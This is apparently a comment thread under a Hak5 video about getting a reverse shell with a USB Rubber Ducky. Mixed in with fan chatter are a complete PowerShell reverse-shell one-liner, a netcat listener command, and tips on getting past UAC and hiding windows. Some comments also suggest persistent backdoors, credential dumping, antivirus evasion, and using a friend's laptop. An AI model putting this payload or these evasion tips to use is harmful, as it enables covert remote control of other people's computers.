How to Get a Reverse Shell in 3 Seconds with the USB Rubber Ducky - Hak5 2110 

Just a tip for anyone that may run into this issue like I have: When you write Ducky code to run CMD (or whatever you choose to open with the RUN command) and simulate the 'ALT + Y' key combination to select the 'Yes' button on the UAC dialog prompt, it's a good idea to follow up on the next line with a 'BACKSPACE' keystroke in the chance you're deploying onto a user's machine that has his/her UAC turned off. Otherwise, if you don't account for UAC being disabled, your first line of code typed into the CMD window will be prefixed with a 'y' character leading off (which of course throws an error and renders the whole payload useless). Pressing backspace as the first key press on a machine that does have UAC enabled will effectively do nothing at all since there's nothing to delete. It's a win-win and you don't have to deal with the irony of your attack being thwarted by someone who has disabled a feature meant to make them safer. It's like leaving your front door open only to have a thief knock himself out cold by walking into the knife edge of the opened door. Haha >.

1 sticker = +0.3 CPU cores

I can't help being distracted by the button presses to change cameras.

Always run your listener with( nc -lvnp 8080 ), so you know you got the incoming connection. It enables verbose mode.

"These hacker stickers make it go faster" -Darren Loooooool

Very good stuff. And the Powershell-script-download-based tactic you show here is a lot more useful, from a practical standpoint, than the Mr. Robot-featured Rubber Ducky attack that you made a vid on a few weeks ago. This doesn't require the logged-in user having admin privileges, and it gets you a shell (from which you can try to do anything you like, including trying to find a way to eventually elevate your privileges to admin and then dump credential hashes). A suggestion: it would be really neat to see a vid where you use a Powershell script along with Empire, Metasploit, or another tool to install a *persisting* backdoor that gets restarted each time a user logs in and periodically reaches back to your server on a schedule of your liking to create a reverse shell or get instructions. .

Got the single stage payload down to a 256 char run command. \o/

I didn't know about the php -S thing. Neat!

when doing this the powershell window stays open, and when closed it closes the session. Is this normal, and if so, can we change the script of the powershell to change this?

you guys rock....thanks for the tetra , turtle and ducky....helped change my life !

Shannon Morse is the best example of nominative determinism I have seen in quite a while!

Denver is at 5280 and that airport is a circus of madness did you catch the crazy apocalypse mural in the concors...

I'm glad to have found this channel since it is very good topics, good presentation and interesting to watch. Thanks sooo much! Reverse shells can be better because a program calling out usually has an easier time getting through a firewall than a program trying to call into a computer. That little php server command is *gold*. Thanks sooo much!

@gain, thank you for all this information. yall always present the info in ways I can keep attention... thank U

I love the energy, you guys ae so fun to watch, cool guys doing cool stuff

OMG thanks to your shirt I just realized that the toor in toorcon is root spelled backwards. I'm ashamed I didn't figure that out sooner. it might also help to actually go or look more into it.

You two ROCK. I love every one of your videos. Keep it up.

ty .. using a Win32 API call to AttachConsole() + a WScript.Shell object ( see MSDN for docs on both ) with the Write method would allow you to exec a command stream more reliably and covertly ( unless that's what you're doing already ). If not, the problem you can run into is needing to keep the console focused. The upside is Powershell can instantiate shell objects and make Win32 API calls ;).

Command Prompt has actually been around since Windows 2000 because Windows 2000 was the first version of Windows to be based on the NT kernel and not the win9x kernel. All win9x version's of Windows were essentially running on top of MS-DOS, and 2000 and newer were NOT based upon MS-DOS, that's why cmd.exe exists in those OS's.

How to change the keyboard layout from Arduino Mini (Pro Micro) to QWERTZ ? have problems with german (QWERTZ) keyboard layouts :c

If you want to go mobile with Netcat, on Android you can use the netcat binary that comes with Busybox (if it's installed, that is).

is there a place to download the 20 second, first script they used at 5:00. i cant find it on their website/the rest of the internet

*So I have a question:* If you don't have access to admin CMD, you can just use regular and write it to the user or temp directory, right? Okay, then, the firewall might block it, but if it is just communicating on the LAN, then the network is set to "Trusted" by default, right? So no privileges needed?

Awesome channel!!! Keep it up! And btw.... Y U NO USE VIM??? :P

You could create a new virtual desktop or workspace (I'm not sure how it's called in windows) to hide a window

If we use the faster way, it needs to download something from a website (in this video Darren's PHP server), which is a concern that already stated at the very beginning of the video isn't it? So if I understand correctly this means we can't get both advantage of high-injection-speed and high-success-chance right? Its a trade-off like, either 1)I sacrifice chance of success by having fast injection through downloading PS script, or 2) do this without downloading the PS script to have a higher chance, but with slower-injection.

Hi Daren if you want a pretty shell just do the same for the meterpreter shell and it's more or less the same time

The only thing I see wrong with this is the problem with it not running as administrator. You'd need to have that same ~3 second delay to run powershell StartProcess powershell -verb RunAs then continue with downloading the PS script.

Does the usb duck have to be permanently in the usb socket of the second computer during the connection or is it enough to insert it for a while while the script is loaded?

Ok I’m using nc on. My macOS Catalina terminal using the command nc -l -p 8080 . I get the error no: missing port with option -l. Any ideas on what could be going wrong?

u can completely hide the CMD prompt from showing up by opening up a separate window using crtl+win+d and once the CMD is executed, u can bo back to the window and delete it... and since going back and deleting will only take like milliseconds... it won't be mostly noticible...

keep up the good work

Anyone know where to get Darren's T-Shirt?

Haha I always rep and tag you guys on social media for thousands and thousands to see 😊 I would scream in excitement if I ever won anything from you guys 😂

That shirt is a must!

Just use the back doors factory, social engineering tools and host the reverse she'll payload. It would be a Meterpreter shell that bypasses Antivirus.

This is like the same thing I posted on there forum but way better lol mine just used the standard Net Cat executable in a zip file in a drop box extracted then ran with cmd via vbs to make it run invisibly. Any way nice job I didn't think this could have been done faster I honestly never thought about a powershell version netcat.

I kinda wish HaK5 would sell the bare minimum Tablet/Portable PC, but make it plug n play style. Branch Out and Expand HaK5!

Excellent !

⁦❤️⁩😁 المشكله تاخذ وقت طويل 😁 احسن شي احسن من روبر دوكي الهندسه العكسيه باستخدام جافا و الفايربيز 😊 قريباً اكملها انشالله 😁 . ال روبردوكي يخوف المستخدم اغلب المستخدمين يخافون من نافذة الامليتور. صراحه صار 4 سنوات اتابع قناة هاك5 و هي من افضل مصادري على الانترنت و بعد قناة hak5 project 313 و بعد قناتين حلوات 😁⁦❤️⁩ am very thankful 🙏 to know you guys 😁❤️ from iraq

would using msfvenom to make a payload, and then emailing it to the victim via a fake email account, and then using the msfconsole to use an exploit to the activate the payload be practical?

`sudo python -m SimpleHTTPServer 80` serves the current directory (`pwd` so you'll need to `cd` first), alternative to the php command as most distros are likely to already have python installed

I love your channel so much😍😍

How about just enabling remote desktop, new admin user and slowing in firewall. Done and no code for defender to hit on.

best blooper ever :)

Heya, I rly want to do this to prank my friend but I am scared I am going to damage my friends laptop. Is there a way where I can remove the reverse shell on his pc, if so can I do it remotely ?

So once the command is run and terminal is open on windows system how do you make that either nt view able or make the power shell close?

you guys so dope !!

SMA sockets on a tin box is good, gives the RF signal a better ground plane..

I need to compile a duckyscript txt file that I wrote originally for my USB Rubber Ducky. But now I need to find a way to run the script as an exe file locally. ¿How can I make this posible? ¿How can I compile the script to an exe file?

Iv'e searched the comments for anything pertaining towards my question but can't seem to find anything! So it seems that this method relies on two conditions being true 1. The user or victim must be logged in 2. The domain this victim is connected to isn't enforcing some sort of group policy (GPO is very common amongst any competent tech team) My question is how can one install netcat on the victim machine if the target does not have any sort of admin privileges for that particular user due to GPO.

Does somebody know how to utilize the Ducky on an Android phone? None of the payloads i found work for me, neither do any shortcuts for physical keyboards connected to Android. If anybody has a working payload for Android (any kind really), would you mind pointing me to it? Or did Android remove some HID funtionality in any newer version?

can i make my flash drive to be usb rubber ducky ? if yes can u give me a link to a paper or information like that

Man miss these episodes

Also how can i get access to hidden directories.

Will this give us consistent access to the computer ? Or just once?

Thoughts : jpeg with embedded nano script utilizing the single stage reverse power shell script?

The powershell window never goes away which really gives it away, even if you hide it in the corner. This seems really good if all you want to do is use it to put a more stable reverse shell on it or grab one quick file.

Will use rubber ducky work if used is blocked on the computer??

Question: How does this work if powershell is in Contrained Language mode?

...and what might you do if Run is disabled?

Do like elie bursztein and have the usb get a reverse tcp meterpreter connection and you will have a prettier shell with clearer commands! Look up mal usb! But otherwise awesome stuff! 👍🤓

You could use the social engineering toolkit "SET" and setup a reverse https meterpreter shell.

Nice! I did something similar with an arduino nano iot with a led screen to "hack" wifi passwords easily. I would connect it to usb and use it as a keyboard to get the current connected wifi, list the password with key clear and send it back through COM to be shown in the LCD. Just for the fun of seeing your friends face when you ask to connect to the wifi and instead of asking for the key you ask to connect that stuff full of dupont cables in a test board to the USB to get it XDDDDDD

I've seen a number of videos on reverse shell. Could they be used to fix a computer with a software problem since you can see everything one it? Could they be used to modify a computer such as to install a working new operating system?

What laptop are you using for linux?

when you want to buy a sticker for 2:50 but it costs 40$ shipping

is shannon using a mini laptop? what is it

First computerphile puts out a video about malware, then you guys? Now you're making me want to get back into the hacking game...

if stickers make it faster, then I need a lot of them

Couldn't you just create the executeable from typing the text you would get if you would of opened it in notepad?

Aren't these power shell scripts mitigated by a good group policy that prevents users from running power shell let alone that downloadstring command

I love the USB Ducky, But the only problem I have is the driver load time on a lot of machines, being a simple HID device, I didnt think it would have to search windows update for a driver and download it, please if their is a bypas to make the install faster let me know!

¿Why is the JAVA -jar XXXX command for?

Can u make a video on hiding payloads in image files for reverse shell

Disk OS...... What happened to dirty operating system

wouldn't it be faster to write to notepad and convert the filename to .bat?

FASTER AND MORE INTENSE!!! xD

what laptops do they use?

does it still works when the cmd is closed? Because the victim might notice and just exit immidiately If so then it's Completely Useless.

Hey does anyone still have the script as its removed from their page. By the way it was really interesting and juicy knowledge

Can you "hotswap" between a hid to mass storage and put a file into the disk then switch over to a hid then run said file?

hak5 will you be selling any more field kits I can't find on your website xD

Can I use an autorun usb with power shell scripts

I managed to get the script down to 258 characters. Everything was going smoothly until I remembered "Oh yeah, you have to invoke powershell in there as well." Back up to 269 we go. Failsauce. Anyway, here's the shortened script: nal f New-Object;$s=(f Net.Sockets.TCPClient(4294967295,8)).GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne0){;$d=(f Text.UTF8Encoding).GetString($b,0,$i);$t=([text.encoding]::UTF8).GetBytes((iex $d 2>&1));$s.Write($t,0,$t.Length)} converted variable names from 2 characters to 1 (10 characters) deleted unnecessary white spaces (2 characters) converted ip address to a 64 bit integer and removed the quotes( (o1*2^24)+(o2*2^16)+(o3*2^8)+(o4) ) (7 characters) moved to port 8 (3 characters) switched to utf-8 encoding (2 characters) created alias f for new-object (1 character) BTW: The character cap on the windows run box is actually only 259 characters.

i made this 0.5 seconds

What is that thing Shannon is on?

Ok, where did he get the shirt? I got to get one.

Love this stuff I definitely plan to get myself one of your Duckys, especially with the fair price tag. Now all I need is to decide on the Payloads, done a lot of testing with RATs but unless I put multiple AV disable which would make the payload very obvious and complex, I would need an undetected payload.

I'm going to do this on my zip disk

Nice i really like you guys from morroco , and i would lik if you present any leasson as hackers in moroco for cyber security presentation 😍😍

Good stuff! That tree command output looks a lot like those tech support scams..... You're the one! ..Except you're missing the accent... Heh

wifi pineapple 2017 lol happy new year

Did this faster than the speed of light

He's my friend and a whole lot more! Ha! Denver... Awesome

could someone help with the r.ps1 part i cant host it

Do ports exist physically or are they just software mechanisms?

Faster and more intense. Put some rubber on it(^.-) (-.^) (^.^) On another note, how would you connect to the reverse shell? What would you define as your end point. Sending it directly to your own equipment at your house isint very sneeky, so if we think "bad hackers" here. Would you than use a "barrowed" credit card to connect to some encrypted GSM equipment paid with that card and forward the connection to yourself or what ideas comes to mind?

should i get a Rasbery pi 3 for kali linux?

Congratulations !!! Made In Brazil - :-)